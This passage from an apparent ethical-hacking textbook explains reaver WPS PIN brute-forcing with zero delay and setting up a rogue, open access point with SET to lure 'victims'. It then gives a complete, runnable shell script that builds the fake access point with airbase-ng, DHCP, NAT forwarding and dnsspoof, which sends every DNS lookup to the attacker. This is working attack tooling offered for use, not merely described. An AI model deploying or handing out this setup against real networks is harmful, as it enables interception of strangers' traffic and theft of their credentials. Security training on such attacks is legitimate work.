306 ◾ Ethical Hacking and Penetration Testing Guide
Reducing the Delay
We can tweak reaver to reduce the delay between PIN attempts. The default delay is 1 s, but we can
reduce it to 0 by specifying the -d (--delay) parameter. Be aware that many access points rate-limit
or lock WPS after a burst of failed PINs, so a zero delay can stall the attack rather than speed it up.
Command:
reaver -i mon0 -b <bssid> -d 0
Further Reading
For further hints, tips, and a usage guide, I recommend taking a look at the official wiki of
reaver:
https://code.google.com/p/reaver-wps/wiki/HintsAndTips
http://www.amazon.com/ALFA-Network-AWUS036H-Wireless-802-11g/dp/B000WXSO76
Setting Up a Fake Access Point with SET to PWN Users
The next attack we will talk about is setting up a rogue or fake access point. Our goal is
to make the victim connect to it, and since we control the access point, we can redirect
traffic as we want. We will use SET (the Social-Engineer Toolkit) to raise the fake access point. Though there are other tools
that can be used here, such as airbase-ng, gerix, etc., I found SET to be the simplest.
Step 1: From the "Social Engineering Attacks" menu, select the "Wireless Access Point Attack
Vector."
Step 2: We can see from the description that we require four utilities to launch this attack
vector, namely airbase-ng, airmon-ng, dnsspoof, and the dhcp3 server. Except for dhcp3, the
other tools come preinstalled with BackTrack 5. Therefore, we need to install dhcp3
in order to launch this attack vector.
Step 3: We use the "apt-get install dhcp3-server" command to install dhcp3 inside
BackTrack. It is listed as already present in the image, since I had already installed it. If you face any problems
while installing the dhcp3 server, I recommend consulting the backtrack-linux.org forum.
Step 4: After you have installed the dhcp3 server, choose the first option in SET to start
setting up the fake access point. Next, SET takes you to the /etc/default/dhcp3-server file,
where you need to specify the interface on which the DHCP server should answer
DHCP requests. We add our wireless interface, "wlan0", as the interface serving DHCP requests.
Step 5: Next, it asks for the DHCP range to assign to the clients that connect to
our access point. I prefer 192.168.10.100-254, since it is a common private range that will not clash with most victims' expectations.
Step 6: Finally, we enter our wireless network interface, which is wlan0 here; yours
might be different, so run iwconfig to check the names of your wireless interfaces.
Now we are all set, and SET launches our fake access point with the SSID
"linksys", which is its default name. It has no encryption set, so any client can associate.
As a side note, if we would like to change the name of our wireless access point, we can do so
by modifying the value of the ACCESS_POINT_SSID parameter inside the SET config file
in the /pentest/exploits/set/config directory.
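To make clear what SET is doing behind those six prompts, here is the same fake access point built by hand with the four utilities the steps above list. This is an added example, not code from the book or from SET itself: the exact commands SET runs internally, the interface names (wlan0, mon0, the at0 tap interface that airbase-ng creates, eth0 as uplink), the channel, and the generated dhcpd.conf are all assumptions for illustration. The two generator functions and the range check run anywhere; only "run" touches the hardware and needs root on BackTrack.

```shell
#!/bin/sh
# Added example: manual equivalent of SET's Wireless Access Point Attack Vector.
# The commands SET issues internally are assumed, not taken from SET's source.
# Interface names, SSID, channel and DHCP range are assumptions (override via env).

WLAN_IF="${WLAN_IF:-wlan0}"      # physical wireless interface (check with iwconfig)
MON_IF="${MON_IF:-mon0}"         # monitor interface created by airmon-ng
AP_IF="${AP_IF:-at0}"            # tap interface airbase-ng creates for the fake AP
UPLINK_IF="${UPLINK_IF:-eth0}"   # interface with real network access, used for NAT
SSID="${SSID:-linksys}"          # open network, no encryption, like SET's default
CHANNEL="${CHANNEL:-6}"
NET="192.168.10"
RANGE_START="${RANGE_START:-100}"
RANGE_END="${RANGE_END:-254}"

# dhcpd.conf matching the "192.168.10.100-254" answer to SET's prompt: hand out
# that range and point clients' DNS at the AP itself, so dnsspoof sees every lookup.
gen_dhcpd_conf() {
    cat <<EOF
default-lease-time 600;
max-lease-time 7200;
subnet ${NET}.0 netmask 255.255.255.0 {
    range ${NET}.${RANGE_START} ${NET}.${RANGE_END};
    option routers ${NET}.1;
    option domain-name-servers ${NET}.1;
}
EOF
}

# dnsspoof hosts file: every name (*) resolves to the AP, so web traffic lands on us.
gen_dnsspoof_hosts() {
    printf '%s.1 *\n' "$NET"
}

# Sanity check before launching: the range must sit inside the /24 and above
# the AP's own address (.1). Returns 0 when valid, 1 otherwise.
check_range() {
    [ "$RANGE_START" -gt 1 ] && [ "$RANGE_START" -le "$RANGE_END" ] && [ "$RANGE_END" -le 254 ]
}

launch_fake_ap() {
    check_range || { echo "bad DHCP range ${RANGE_START}-${RANGE_END}" >&2; return 1; }
    gen_dhcpd_conf     > /tmp/fakeap-dhcpd.conf
    gen_dnsspoof_hosts > /tmp/fakeap-hosts
    airmon-ng start "$WLAN_IF"
    # -e sets the ESSID, -c the channel; airbase-ng brings up $AP_IF (at0) when it starts
    airbase-ng -e "$SSID" -c "$CHANNEL" "$MON_IF" &
    sleep 3
    ifconfig "$AP_IF" up "${NET}.1" netmask 255.255.255.0
    # forward and masquerade so the AP "works" from the victim's point of view
    sysctl -w net.ipv4.ip_forward=1
    iptables -t nat -A POSTROUTING -o "$UPLINK_IF" -j MASQUERADE
    dhcpd3 -cf /tmp/fakeap-dhcpd.conf "$AP_IF"    # dhcp3-server's daemon on BackTrack 5
    dnsspoof -i "$AP_IF" -f /tmp/fakeap-hosts
}

# Only touch the hardware when explicitly asked:  sh fakeap.sh run
if [ "${1:-}" = "run" ]; then
    launch_fake_ap
fi
```

Serving DHCP on the tap interface that airbase-ng creates, rather than on wlan0 directly, is the detail that most often trips people up when they reproduce this outside SET; if clients associate but never get an address, check which interface dhcpd3 is bound to.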